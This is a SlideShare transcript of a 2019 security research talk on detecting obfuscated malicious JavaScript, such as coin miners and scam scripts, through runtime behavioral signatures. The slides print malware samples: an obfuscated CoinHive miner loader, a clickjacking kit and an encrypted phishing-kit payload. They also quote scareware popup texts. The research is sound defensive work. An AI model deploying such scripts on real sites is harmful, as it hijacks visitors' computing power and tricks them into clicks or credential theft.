SlideShare a Scribd company logo

[WTMC 2019] Detecting malicious campaigns in obfuscated JavaScript with scalable behavioral analysis

Oleksii Starov, profile picture
Oleksii Starov

The document discusses techniques for detecting obfuscated malicious JavaScript campaigns through scalable behavioral analysis. It proposes analyzing runtime behaviors like global variable names, network traffic patterns, and UI interactions to identify malicious scripts, even when code has been packed or obfuscated. Examples are given of how behavioral signatures could detect encrypted cryptocurrency miners and clickjacking scripts by looking for behaviors like cryptomining initialization and dynamic UI hiding/showing. The document argues this behavioral approach can effectively detect variations of known malware families and emerging malicious campaigns.

Science
Related topics:
Information Security
1 of 26
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Detecting malicious campaigns in obfuscated JavaScript with scalable behavioral analysis Oleksii Starov, Yuchen Zhou, Jun Wang Palo Alto Networks, Inc.
Malicious JavaScript Detection in Previous Research & Industry Approaches Static Analysis Dynamic Analysis Signature Matching ML/DL Models 2 | WTMC 2019 Ø We propose “behavioral” runtime signatures: ü Based on lightweight in-browser execution, and thus effectively scalable ü Capable to detect variations of packed/obfuscated malware ü Capable to detect modern malicious campaigns ???
3 | WTMC 2019 GLOBAL VARIABLES Studied Types of Behavioral Signatures Non-HTTP Traffic WEBSOCKET CONNECTIONS AND MESSAGES Rendered Visible Text JAVASCRIPT ALERTS AND POPUPS Runtime Code Representation
Example: In-browser Cryptographic Coin Miners <script> var miner = new CoinHive.User(’SITE_KEY’, ’john-doe’); miner.start(); var miner = new CRLT.Anonymous(’PUBLIC_KEY’, {threads:2}); miner.start(); … </script> 4 | WTMC 2019 Adless, BatMine, CoinBlind, CoinHave, CoinImp, CoinNebula, Coinhive, Crypto-Loot, CryptoNoter, DeepMiner, Grindcash, JSE-Coin, JsMiner, Mineralt, Minr, Monerise, NFWebMiner, NeroHut, Papoto, ProjectPoi, WebXMR Webmine, Webminerpool
Global Variable Signatures: Detecting Obfuscated Miners (function(){ var _0xdf51=["x70x61x72x61x6Dx73","x5Fx73x69x74x65x4Bx65x79", "x5Fx75x73x65x72","x5Fx74x68x72x65x61x64x73","x5Fx68x61x73x68x65x73"," x5Fx63x75x72x72x65x6Ex74x4Ax6Fx62","x5Fx61x75x74x6Fx52x65x63x6Fx6Ex6 Ex65x63x74", ... MINER_URL:_0xdf51[207],AUTH_URL:_0xdf51[208]};CoinHive[_0xdf51[104]]= CoinHive.Res(_0xdf51[209]);var user=window[_0xdf51[211]][_0xdf51[210]]|| _0xdf51[212],miner= new CoinHive.User(_0xdf51[213],user,{throttle:0.3});miner[_0xdf51[89]]()|| miner[_0xdf51[53]]() })(); 5 | WTMC 2019 Still “CoinHive” and “miner” variables (with clear semantics) during runtime!
Example: Clickjacking Kit jQuery(document).ready(function() { $("#clickjack-button-wrapper-5") .parent().mousemove(function(e) { jQuery("#clickjack-button-wrapper-5").css({ top: e.pageY - 10, left: e.pageX + 30 }); }); clickjack_hider(); var clickjack_fb_timer = setTimeout("clickjack_hider()", 5000); }); function clickjack_hider() { jQuery("input").mouseout(function() { ClickJackFbShow(); }); jQuery("a").mouseout(function() { ClickJackFbShow(); }); jQuery("button").mouseout(function() { ClickJackFbShow(); }); jQuery("textarea").mouseout(function() { ClickJackFbShow(); }); jQuery(".ratingblock").mouseout(function() { ClickJackFbShow(); }); jQuery("object").mouseout(function() { ClickJackFbShow(); }); jQuery("input").mouseover(function() { ClickJackFbHide(); }); jQuery("a").mouseover(function() { ClickJackFbHide(); }); jQuery("button").mouseover(function() { ClickJackFbHide(); }); jQuery("textarea").mouseover(function() { ClickJackFbHide(); }); jQuery(".ratingblock").mouseover(function() { ClickJackFbHide(); }); jQuery("object").mouseover(function() { ClickJackFbHide(); }); } … ü clickjack_hider ü ClickJackFbShow ü ClickJackFbHide 6 | WTMC 2019
Example: Phishing Kit 7 | WTMC 2019 var hea2p = ('0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz'); var hea2t = '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 GxOB6PGs='; var output = Aes.Ctr.decrypt(hea2t, hea2p, 256); document.write(output)
Websocket Signatures: Detecting Unauthorized Miners Stratum Protocol Messages Request: { "type": "submit", "params": { "version": 7, "job_id": "871932594873942", "nonce": "8a462f80", "result": "7516e7...de4df27f300" } } Response: { "type": "hash_accepted", "params": { "hashes": 256 } } 8 | WTMC 2019 Obfuscated CoinImp Messages Request: suu9sLms6/PruryrpKC96+Xruai7qKS66/Oy66e mp6qs6/Prqvqqr//+//jr5eu7rLq8pb3r8+us// itqP2v8f//+6+tqKj5q/n7qPz48PuvqP//qK/++ Pz8+PD9+6z8+6r8/qqv8f6o/qiv8fzx/f//+v77 +fn56+Xro6arlqCt6/Pr+v/5+v/x/vD4+P7/+fn /67S0 Response: suu9sLms6/Pp66Omq+vl6eu5qLuopLrr8+my66u lpqvr8+nr+fD58Kr68Pzw/6z5+fzx8Pr4/KusqP H6+Kr4rKj6+aiqq63xqPiorPv8qPqo8P77qP/// K36qv7x/auqr/DxqPv68PD9+aut+a+s8fGv+fn5 +fn5+fn9qq2s/fuqr/2orf+r8az4//+sraiqqv7 88Putq/D7/vn/qqz8+quorfz7qPGo+fHxr/Go/P v4raj7/Kiv8az/+fvr5enro6arlqCt6/Pp6/r/+ fr/8f7w+Pj+//n5/+vl6eu9qLuurL3r8+nr+a3+ /a2o+fnr5enrvqCt6/Pp+Pu0tA== (despite the several layers of obfuscation)
JavaScript Popups and Alerts (and related API calls) 9 | WTMC 2019 • “WARNING! Your official Adobe Flash Player version is out of date. Please install latest software update to continue. Please click "Update" to continue.” • "IMMEDIATELY CALL APPLE CARE" • "Congratulations Amazon user!" • "Microsoft Excel, Click "OK" below to view your file online instead" Inercepted APIs: window.alert, window.prompt, window.confirm, window.onbeforeunload
Data Collection & Results
Production Pipeline & Data Collection We measure how behavioral signatures can improve a state-of-the-art commercial URL categorization service • Crawling data • Daily feed of "unknown" URLs visited by Palo Alto Networks customers (i.e. more than 10M URLs per day) • Reporting results for November 2018 • Crawling infrastructure • Existing security scanner based on Headless Chrome Browser • Added with collecting global variables, intercepting JavaScript alerts, and recording WebSocket handshakes/messages • 250 unique signatures for detection • Collected semi-automatically by retrieving dynamic artifacts from VirusTotal URLs • Attributing 23 coin-mining libraries 11 | WTMC 2019
RESULT HIGHLIGTS Overall detection results • 9,104 coin-mining scripts over 8,712 distinct URLs • 4,788 other malicious JavaScripts over 4,633 distinct URLs Real user impact (if blocked) • Over 1M requests towards coin-mining websites • Over 243K towards scams/scareware/phishing pages 12 | WTMC 2019
Intrusive Coin Miners
Daily Detection Rate of Coin-mining URLs 14 | WTMC 2019 • 1,097 coin-mining URLs on average per day • Only 180 previously unseen URLs daily! • 69.1% of detected URLs perform “unauthorized” successful coin mining • 1,414 out of 4,264 Coinhive scripts were obfuscated and undetected by static matching
Top Coin Miners Observed during Study 15 | WTMC 2019 Unauthorized mining: • CoinImp (100% / 612 JS) • Crypto-Loot (86% / 906 JS) • Coinhive (77.7% / 3,312 JS) • Unidentified Stratum
Malicious Operators Rotate or Even Use Several Miners 16 | WTMC 2019 9,104 script detected over 8,712 URLs!
Non-mining Malicious JavaScript
Daily Detection Rate of Coin-mining URLs 18 | WTMC 2019 • 184 malicious URLs per day, including 143 URLs unseen previously • URLs hosting non-mining JS malware are less likely to be observed for many days in a row!
Top Recently Observed Non-Mining Malicious JavaScripts 19 | WTMC 2019 Our signatures capture many scam-related scripts!
Analysis of Malicious Domains
Using Passive DNS to Measure Popularity & Lifetime 21 | WTMC 2019 • 8,712 detected coin-mining URLs resolve to 7,654 distinct domains • 4,633 URLs with other malicious scripts resolve to 2,666 domains • Two visual clusters: • Coin-mining domains receive tens of millions DNS resolutions and can live for more than 4 year • Non-mining malicious domains are usually alive for less than 100 days and receive less than 10K DNS resolutions seriesfree.to vs. win32-0x2ndt-firewall-error.gq
Popularity Analysis Using Alexa rankings 22 | WTMC 2019 • 66.9% of coin-mining domains were observed in Alexa’s top 1M • 16,9% remained in the top 1M during the whole month • 37 domains in the first 10K • 932 mining immediately • In contrast, only 71 from non- mining malicious JavaScript domains were found in Alexa’s top 1M
Analysis of TLDs among Detected Malicious Websites Coin-mining websites Non-mining websites TLD # Domains # Domains # Domains com 3,487 icu 1,299 ir 394 com 409 net 337 club 290 ru 319 xyz 83 org 285 tk 71 23 | WTMC 2019 • In November 2018, the .icu TLD was abused the most to distribute different kinds of scam • Coin-miners tend to reside on generally more expensive (and reputable) .com, which matches our previous findings
Country origin of IPs serving malicious JavaScript 24 | WTMC 2019 Coin miners Other malicious JS Coin-mining websites cover more countries!
CONCLUSION & FURTURE WORK • We presented several examples of lightweight dynamic techniques to detect obfuscated malicious JavaScript using behavioral signatures • On a large scale and detecting modern malicious campaigns • Extending and generalizing the method: • More “runtime-code-representation” signatures (such as, types and values of variables, local variables, custom implementation of alerts, eval code, etc.) • Automated retrieval of behavioral signature (using clustering and benign scores) • Using behavioral signatures as features for ML detection models • Using behavioral signatures for attribution of malicious campaigns 25 | WTMC 2019
THANK YOU! QA? Email: ostarov@paloaltonetworks.com l Twitter: @o_starov

More Related Content

PDF
The slower the stronger a story of password hash migration
OWASP
 
PDF
Javascript Object Signing & Encryption
Aaron Zauner
 
PDF
FwDays 2021: Metarhia Technology Stack for Node.js
Timur Shemsedinov
 
PPT
Security's Once and Future King
Kapil Sachdeva
 
PDF
Banking on a Blockchain
Altoros
 
PDF
Insight User Conference Bootcamp - Use the Engagement Tracking and Metrics A...
SparkPost
 
PDF
OWASP Top 10 - DrupalCon Amsterdam 2019
Ayesh Karunaratne
 
PPTX
From on premises monolith to cloud microservices
Albert Lombarte
 
The slower the stronger a story of password hash migration
OWASP
 
Javascript Object Signing & Encryption
Aaron Zauner
 
FwDays 2021: Metarhia Technology Stack for Node.js
Timur Shemsedinov
 
Security's Once and Future King
Kapil Sachdeva
 
Banking on a Blockchain
Altoros
 
Insight User Conference Bootcamp - Use the Engagement Tracking and Metrics A...
SparkPost
 
OWASP Top 10 - DrupalCon Amsterdam 2019
Ayesh Karunaratne
 
From on premises monolith to cloud microservices
Albert Lombarte
 

Similar to [WTMC 2019] Detecting malicious campaigns in obfuscated JavaScript with scalable behavioral analysis (20)

PDF
Compromised e commerce_sites_lead_to_web-based_keyloggers
Andrey Apuhtin
 
PPTX
Introduction to WSO2 Data Analytics Platform
Srinath Perera
 
PPTX
Security in NodeJS applications
Daniel Garcia (a.k.a cr0hn)
 
PDF
CIS 2015- NAPPS within Public Safety- Adam Lewis
CloudIDSummit
 
PDF
Instrumenting and Scaling Databases with Envoy
Daniel Hochman
 
PDF
Liquid Stream Processing Across Web Browsers and Web Servers
Masiar Babazadeh
 
PDF
Large scale data capture and experimentation platform at Grab
Roman
 
PDF
Single sign-on
Marek Stępniowski
 
PDF
Putting microservices on a diet with istio
QAware GmbH
 
PDF
EDA Meets Data Engineering – What's the Big Deal?
confluent
 
PDF
iMasters Intercon 2016 - Identity within Microservices
Erick Belluci Tedeschi
 
PDF
InterCon 2016 - Segurança de identidade digital levando em consideração uma a...
iMasters
 
PDF
Www usenix-org
Ouzza Brahim
 
PDF
Putting Microservices on a Diet: with Istio!
QAware GmbH
 
PDF
Slicing Apples with Ninja Sword: Fighting Malware at the Corporate Level (OWA...
Jakub "Kuba" Sendor
 
PDF
Spark Summit Europe 2017 - Applying multiple ML pipelines to heterogenous dat...
mdabrowski
 
PDF
Automated Apache Kafka Mocking and Testing with AsyncAPI | Hugo Guerrero, Red...
HostedbyConfluent
 
PDF
Stream Processing with Apache Kafka and .NET
confluent
 
PDF
Romulus OWASP
Grupo Gesfor I+D+i
 
PDF
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Anna Klepacka
 
Compromised e commerce_sites_lead_to_web-based_keyloggers
Andrey Apuhtin
 
Introduction to WSO2 Data Analytics Platform
Srinath Perera
 
Security in NodeJS applications
Daniel Garcia (a.k.a cr0hn)
 
CIS 2015- NAPPS within Public Safety- Adam Lewis
CloudIDSummit
 
Instrumenting and Scaling Databases with Envoy
Daniel Hochman
 
Liquid Stream Processing Across Web Browsers and Web Servers
Masiar Babazadeh
 
Large scale data capture and experimentation platform at Grab
Roman
 
Single sign-on
Marek Stępniowski
 
Putting microservices on a diet with istio
QAware GmbH
 
EDA Meets Data Engineering – What's the Big Deal?
confluent
 
iMasters Intercon 2016 - Identity within Microservices
Erick Belluci Tedeschi
 
InterCon 2016 - Segurança de identidade digital levando em consideração uma a...
iMasters
 
Www usenix-org
Ouzza Brahim
 
Putting Microservices on a Diet: with Istio!
QAware GmbH
 
Slicing Apples with Ninja Sword: Fighting Malware at the Corporate Level (OWA...
Jakub "Kuba" Sendor
 
Spark Summit Europe 2017 - Applying multiple ML pipelines to heterogenous dat...
mdabrowski
 
Automated Apache Kafka Mocking and Testing with AsyncAPI | Hugo Guerrero, Red...
HostedbyConfluent
 
Stream Processing with Apache Kafka and .NET
confluent
 
Romulus OWASP
Grupo Gesfor I+D+i
 
Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example
Anna Klepacka
 
Ad

Recently uploaded (20)

PPTX
famous lake in india and its disturibution and importance
judesebina
 
PPTX
TOTAL hIP ARTHROPLASTY Presentation.pptx
hararghemssc
 
PPTX
Taita Taveta Laboratory Technician Workshop Presentation.pptx
CALVINCEOWINO
 
PDF
lecture 2026 of Sjogren's syndrome l .pdf
ssuserf13226
 
PPTX
ECG_Course_Presentation د.محمد صقران ppt
lelouchml1995
 
PDF
An interstellar mission to test astrophysical black holes
Sérgio Sacani
 
PPTX
cpcsea ppt.pptxssssssssssssssjjdjdndndddd
amolpawasesng123
 
PDF
SEHH2274 Organic Chemistry Notes 1 Structure and Bonding.pdf
ivan1108lau
 
PPTX
DRUG THERAPY FOR SHOCK gjjjgfhhhhh.pptx.
vipvivek704
 
PDF
. Radiology Case Scenariosssssssssssssss
MiraMusleh
 
PPTX
ognitive-behavioral therapy, mindfulness-based approaches, coping skills trai...
OliveJolly1
 
PDF
Biophysics 2.pdffffffffffffffffffffffffff
MiraMusleh
 
PDF
Placing the Near-Earth Object Impact Probability in Context
Sérgio Sacani
 
PPTX
2Systematics of Living Organisms t-.pptx
RachanaT6
 
PPTX
EPIDURAL ANESTHESIA ANATOMY AND PHYSIOLOGY.pptx
PrabakaranMP1
 
PPTX
neck nodes and dissection types and lymph nodes levels
DipuSarma
 
PDF
HPLC-PPT.docx high performance liquid chromatography
darshanambiga1633
 
PPTX
2. Earth - The Living Planet Module 2ELS
markjustinebarolobau
 
PDF
ELS_Q1_Module-11_Formation-of-Rock-Layers_v2.pdf
savannaesar07
 
PDF
VARICELLA VACCINATION: A POTENTIAL STRATEGY FOR PREVENTING MULTIPLE SCLEROSIS
ijab2
 
famous lake in india and its disturibution and importance
judesebina
 
TOTAL hIP ARTHROPLASTY Presentation.pptx
hararghemssc
 
Taita Taveta Laboratory Technician Workshop Presentation.pptx
CALVINCEOWINO
 
lecture 2026 of Sjogren's syndrome l .pdf
ssuserf13226
 
ECG_Course_Presentation د.محمد صقران ppt
lelouchml1995
 
An interstellar mission to test astrophysical black holes
Sérgio Sacani
 
cpcsea ppt.pptxssssssssssssssjjdjdndndddd
amolpawasesng123
 
SEHH2274 Organic Chemistry Notes 1 Structure and Bonding.pdf
ivan1108lau
 
DRUG THERAPY FOR SHOCK gjjjgfhhhhh.pptx.
vipvivek704
 
. Radiology Case Scenariosssssssssssssss
MiraMusleh
 
ognitive-behavioral therapy, mindfulness-based approaches, coping skills trai...
OliveJolly1
 
Biophysics 2.pdffffffffffffffffffffffffff
MiraMusleh
 
Placing the Near-Earth Object Impact Probability in Context
Sérgio Sacani
 
2Systematics of Living Organisms t-.pptx
RachanaT6
 
EPIDURAL ANESTHESIA ANATOMY AND PHYSIOLOGY.pptx
PrabakaranMP1
 
neck nodes and dissection types and lymph nodes levels
DipuSarma
 
HPLC-PPT.docx high performance liquid chromatography
darshanambiga1633
 
2. Earth - The Living Planet Module 2ELS
markjustinebarolobau
 
ELS_Q1_Module-11_Formation-of-Rock-Layers_v2.pdf
savannaesar07
 
VARICELLA VACCINATION: A POTENTIAL STRATEGY FOR PREVENTING MULTIPLE SCLEROSIS
ijab2
 
Ad

[WTMC 2019] Detecting malicious campaigns in obfuscated JavaScript with scalable behavioral analysis

  • 1. Detecting malicious campaigns in obfuscated JavaScript with scalable behavioral analysis Oleksii Starov, Yuchen Zhou, Jun Wang Palo Alto Networks, Inc.
  • 2. Malicious JavaScript Detection in Previous Research & Industry Approaches Static Analysis Dynamic Analysis Signature Matching ML/DL Models 2 | WTMC 2019 Ø We propose “behavioral” runtime signatures: ü Based on lightweight in-browser execution, and thus effectively scalable ü Capable to detect variations of packed/obfuscated malware ü Capable to detect modern malicious campaigns ???
  • 3. 3 | WTMC 2019 GLOBAL VARIABLES Studied Types of Behavioral Signatures Non-HTTP Traffic WEBSOCKET CONNECTIONS AND MESSAGES Rendered Visible Text JAVASCRIPT ALERTS AND POPUPS Runtime Code Representation
  • 4. Example: In-browser Cryptographic Coin Miners <script> var miner = new CoinHive.User(’SITE_KEY’, ’john-doe’); miner.start(); var miner = new CRLT.Anonymous(’PUBLIC_KEY’, {threads:2}); miner.start(); … </script> 4 | WTMC 2019 Adless, BatMine, CoinBlind, CoinHave, CoinImp, CoinNebula, Coinhive, Crypto-Loot, CryptoNoter, DeepMiner, Grindcash, JSE-Coin, JsMiner, Mineralt, Minr, Monerise, NFWebMiner, NeroHut, Papoto, ProjectPoi, WebXMR Webmine, Webminerpool
  • 5. Global Variable Signatures: Detecting Obfuscated Miners (function(){ var _0xdf51=["x70x61x72x61x6Dx73","x5Fx73x69x74x65x4Bx65x79", "x5Fx75x73x65x72","x5Fx74x68x72x65x61x64x73","x5Fx68x61x73x68x65x73"," x5Fx63x75x72x72x65x6Ex74x4Ax6Fx62","x5Fx61x75x74x6Fx52x65x63x6Fx6Ex6 Ex65x63x74", ... MINER_URL:_0xdf51[207],AUTH_URL:_0xdf51[208]};CoinHive[_0xdf51[104]]= CoinHive.Res(_0xdf51[209]);var user=window[_0xdf51[211]][_0xdf51[210]]|| _0xdf51[212],miner= new CoinHive.User(_0xdf51[213],user,{throttle:0.3});miner[_0xdf51[89]]()|| miner[_0xdf51[53]]() })(); 5 | WTMC 2019 Still “CoinHive” and “miner” variables (with clear semantics) during runtime!
  • 6. Example: Clickjacking Kit jQuery(document).ready(function() { $("#clickjack-button-wrapper-5") .parent().mousemove(function(e) { jQuery("#clickjack-button-wrapper-5").css({ top: e.pageY - 10, left: e.pageX + 30 }); }); clickjack_hider(); var clickjack_fb_timer = setTimeout("clickjack_hider()", 5000); }); function clickjack_hider() { jQuery("input").mouseout(function() { ClickJackFbShow(); }); jQuery("a").mouseout(function() { ClickJackFbShow(); }); jQuery("button").mouseout(function() { ClickJackFbShow(); }); jQuery("textarea").mouseout(function() { ClickJackFbShow(); }); jQuery(".ratingblock").mouseout(function() { ClickJackFbShow(); }); jQuery("object").mouseout(function() { ClickJackFbShow(); }); jQuery("input").mouseover(function() { ClickJackFbHide(); }); jQuery("a").mouseover(function() { ClickJackFbHide(); }); jQuery("button").mouseover(function() { ClickJackFbHide(); }); jQuery("textarea").mouseover(function() { ClickJackFbHide(); }); jQuery(".ratingblock").mouseover(function() { ClickJackFbHide(); }); jQuery("object").mouseover(function() { ClickJackFbHide(); }); } … ü clickjack_hider ü ClickJackFbShow ü ClickJackFbHide 6 | WTMC 2019
  • 7. Example: Phishing Kit 7 | WTMC 2019 var hea2p = ('0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz'); var hea2t = 'UQIqIxFiqFvTwP5ovMqrc9ml0GHxUqsv0qWaSdrXOFJw3VOAJf1gvPk+QBh7Vp+Mw6Z6uS+kTPYikXQcCQtwsrY9Q4bxTlp19uQHk6poa1mGy8/1uCIrMarTmM01aa0CR7yOoa3nPkG1wmorbr14ETB+pWCWfV737Wr03qjYFQmxrhe7k7+ EbDDZtW+OdbGci6S2Uqmg82YjE9gUghxTNrbNMjEzrq1j5vydyNeqSNLjTQQZb/MnqtiD8/s2Vh2qRh1Ir+mv52snvK4JavqPy2f+xbcPxZ+x+dbGCP4fXwRYgimcrrevwRyCgDJfxjoS6r8/ymliVdT7ymMbJX0yMX5JPo3H9ddlAFq17ge U5wSykZshItSIYyhG1dte7BPQpirCUcmWcX3hYfRGm+16M4MCP+2puNUFhRCvK4+vYsbYIZmapjssc/8cm0sCKv1JUQ9wXeMTqYwdDWT8HEY6fQF41zTiYIjTlqqaMsU1oHqlYOhSaIGur3d57bMOfPTGxDRzj5/TLauNDaJblTDQnP764zv 